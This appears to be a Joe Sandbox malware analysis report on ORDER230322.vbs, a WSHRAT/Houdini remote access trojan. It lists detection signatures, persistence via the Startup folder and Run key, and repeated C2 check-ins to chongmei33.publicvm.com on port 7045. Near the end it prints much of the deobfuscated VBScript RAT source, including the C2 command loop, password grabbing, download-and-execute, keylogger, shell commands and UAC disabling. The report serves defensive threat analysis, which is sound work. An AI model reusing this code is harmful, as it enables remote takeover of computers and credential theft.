Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER230322.vbs

Overview

General Information

Sample Name:ORDER230322.vbs
Analysis ID:832141
MD5:2a76503660d140d0aa08bd758cb9c29c
SHA1:55c1ba23321e11c0298450fb9dfa1ccebdea2d86
SHA256:5f0329e51f347ca573ea69cd865bb03d0526d9e9e91477a4502a9fe35c3fbddf
Tags:RATvbsWSHRAT
Infos:

Detection

WSHRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected WSHRAT
Detected WSHRat
System process connects to network (likely due to code injection or exploit)
Sigma detected: Register Wscript In Run Key
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
Snort IDS alert for network traffic
Wscript called in batch mode (surpress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
C2 URLs / IPs found in malware configuration
Uses known network protocols on non-standard ports
Drops VBS files to the startup folder
Windows Shell Script Host drops VBS files
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2352 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5448 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 1276 cmdline: C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 4024 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6032 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Houdini, WSHRATHoudini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Malware Configuration

Threatname: WSHRAT

{"C2 url": "chongmei33.publicvm.com", "Port": "7045", "Install folder": "%temp%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WSHRATYara detected WSHRATJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_5492.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
      amsi64_2352.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
        amsi64_5448.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
          amsi64_4024.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security

            Sigma Signatures

            Data Obfuscation

            barindex
            Sigma detected: Drops script at startup location
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5492, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs

            Persistence and Installation Behavior

            barindex
            Sigma detected: Register Wscript In Run Key
            Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 5492, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ORDER230322

            Snort Signatures

            Timestamp:192.168.2.3103.47.144.224972770452017516 03/22/23-11:40:42.430467
            SID:2017516
            Source Port:49727
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224973070452017516 03/22/23-11:41:00.836849
            SID:2017516
            Source Port:49730
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972370452017516 03/22/23-11:40:19.769701
            SID:2017516
            Source Port:49723
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970770452017516 03/22/23-11:38:44.353443
            SID:2017516
            Source Port:49707
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971170452017516 03/22/23-11:39:07.144389
            SID:2017516
            Source Port:49711
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971770452017516 03/22/23-11:39:44.283625
            SID:2017516
            Source Port:49717
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971370452017516 03/22/23-11:39:18.634150
            SID:2017516
            Source Port:49713
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970370452017516 03/22/23-11:38:21.870237
            SID:2017516
            Source Port:49703
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972170452017516 03/22/23-11:40:08.630285
            SID:2017516
            Source Port:49721
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224973170452017516 03/22/23-11:41:06.386063
            SID:2017516
            Source Port:49731
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972670452017516 03/22/23-11:40:36.721932
            SID:2017516
            Source Port:49726
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970670452017516 03/22/23-11:38:37.956187
            SID:2017516
            Source Port:49706
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971670452017516 03/22/23-11:39:38.695593
            SID:2017516
            Source Port:49716
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970970452017516 03/22/23-11:38:55.844827
            SID:2017516
            Source Port:49709
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971270452017516 03/22/23-11:39:12.966342
            SID:2017516
            Source Port:49712
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224969870452017516 03/22/23-11:37:51.449935
            SID:2017516
            Source Port:49698
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970270452017516 03/22/23-11:38:16.269118
            SID:2017516
            Source Port:49702
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971970452017516 03/22/23-11:39:56.012177
            SID:2017516
            Source Port:49719
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972270452017516 03/22/23-11:40:14.190562
            SID:2017516
            Source Port:49722
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972970452017516 03/22/23-11:40:53.627793
            SID:2017516
            Source Port:49729
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224973270452017516 03/22/23-11:41:12.041835
            SID:2017516
            Source Port:49732
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971570452017516 03/22/23-11:39:32.263868
            SID:2017516
            Source Port:49715
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970570452017516 03/22/23-11:38:31.858320
            SID:2017516
            Source Port:49705
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972570452017516 03/22/23-11:40:31.131057
            SID:2017516
            Source Port:49725
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971870452017516 03/22/23-11:39:50.397216
            SID:2017516
            Source Port:49718
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224969970452017516 03/22/23-11:37:58.976360
            SID:2017516
            Source Port:49699
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970170452017516 03/22/23-11:38:10.473997
            SID:2017516
            Source Port:49701
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972870452017516 03/22/23-11:40:47.984993
            SID:2017516
            Source Port:49728
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970070452017516 03/22/23-11:38:04.682959
            SID:2017516
            Source Port:49700
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972470452017516 03/22/23-11:40:25.447386
            SID:2017516
            Source Port:49724
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971070452017516 03/22/23-11:39:01.482922
            SID:2017516
            Source Port:49710
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224972070452017516 03/22/23-11:40:01.578389
            SID:2017516
            Source Port:49720
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224970870452017516 03/22/23-11:38:50.072461
            SID:2017516
            Source Port:49708
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3103.47.144.224971470452017516 03/22/23-11:39:24.263757
            SID:2017516
            Source Port:49714
            Destination Port:7045
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: ORDER230322.vbsReversingLabs: Detection: 27%
            Source: ORDER230322.vbsVirustotal: Detection: 41%Perma Link
            Source: amsi64_5492.amsi.csvMalware Configuration Extractor: WSHRAT {"C2 url": "chongmei33.publicvm.com", "Port": "7045", "Install folder": "%temp%"}

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeDomain query: chongmei33.publicvm.com
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 103.47.144.22 7045Jump to behavior
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49698 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49699 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49700 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49701 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49702 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49703 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49705 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49706 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49707 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49708 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49709 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49710 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49711 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49712 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49713 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49714 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49715 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49716 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49717 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49718 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49719 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49720 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49721 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49722 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49723 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49724 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49725 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49726 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49727 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49728 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49729 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49730 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49731 -> 103.47.144.22:7045
            Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49732 -> 103.47.144.22:7045
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: chongmei33.publicvm.com
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 7045 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7045
            Source: global trafficTCP traffic: 192.168.2.3:49698 -> 103.47.144.22:7045
            Source: unknownHTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual BasicAccept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: chongmei33.publicvm.com:7045Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: chongmei33.publicvm.com

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected WSHRAT
            Source: Yara matchFile source: amsi64_5492.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_2352.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_5448.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_4024.amsi.csv, type: OTHER
            Source: Yara matchFile source: dump.pcap, type: PCAP

            System Summary

            barindex
            Wscript called in batch mode (surpress errors)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: ORDER230322.vbsInitial sample: Strings found which are bigger than 50
            Source: ORDER230322.vbsReversingLabs: Detection: 27%
            Source: ORDER230322.vbsVirustotal: Detection: 41%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs"
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@8/4@1/1
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 1009'<[ recoder : kognito (c) skype : live:unknown.sales64 ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "chongmei33.publicvm.com"port = 7045installdir = "%temp%"lnkfile = truelnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell")dim filesystemobjset filesystemobj = createobject("scripting.filesystemobject")dim httpobjset httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptnamestartup = shellobj.specialfolders ("startup") & "\"installdir = shellobj.expandenvironmentstrings(installdir) & "\"if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"spliter = "|"sleep = 5000 dim responsedim cmddim paraminfo = ""usbspreading = ""startdate = ""dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=on error resume nextinstancewhile trueinstallresponse = ""response = post ("is-ready","")cmd = split (response,spliter)select case cmd (0)case "disconnect" wscript.quitcase "reboot" shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUEcase "shutdown" shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUEcase "excecute" param = cmd (1) execute paramcase "get-pass" passgrabber cmd(1), "cmdv.exe", cmd(2)case "uninstall" uninstallcase "up-n-exec" download cmd (1),cmd (2)case "bring-log" upload installdir & "wshlogs\" & cmd (1), "take-log"case "down-n-exec" sitedownloader cmd (1),cmd (2)case "filemanager" servicestarter cmd(1), "fm-plugin.exe", information() case "rdp" servicestarter cmd(1), "rd-plugin.exe", information()case "keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0case "offline-keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1case "browse-logs" post "is-logs", enumfaf(installdir & "wshlogs")case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param)case "get-processes" post "is-processes", enumprocess()case "disable-uac" if WScript.Arguments.Named.Exists("elevated") = true thenset oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0oReg = nothingupdatestatus("UAC+Disabled+(Reboot+Required)") end ifcase "elevate" if WScript.Arguments.Named.Exists("elevated") = false thenon error resume nextoneonce.close()oneonce = nothingWScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1updatestatus("Client+Elevated")WScript.quit elseupdatestatus("Client+Elevated") end ifcase "if-elevate" if WScript.Arguments.Named.Exists("el
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 1009'<[ recoder : kognito (c) skype : live:unknown.sales64 ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "chongmei33.publicvm.com"port = 7045installdir = "%temp%"lnkfile = truelnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell")dim filesystemobjset filesystemobj = createobject("scripting.filesystemobject")dim httpobjset httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptnamestartup = shellobj.specialfolders ("startup") & "\"installdir = shellobj.expandenvironmentstrings(installdir) & "\"if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"spliter = "|"sleep = 5000 dim responsedim cmddim paraminfo = ""usbspreading = ""startdate = ""dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=on error resume nextinstancewhile trueinstallresponse = ""response = post ("is-ready","")cmd = split (response,spliter)select case cmd (0)case "disconnect" wscript.quitcase "reboot" shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUEcase "shutdown" shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUEcase "excecute" param = cmd (1) execute paramcase "get-pass" passgrabber cmd(1), 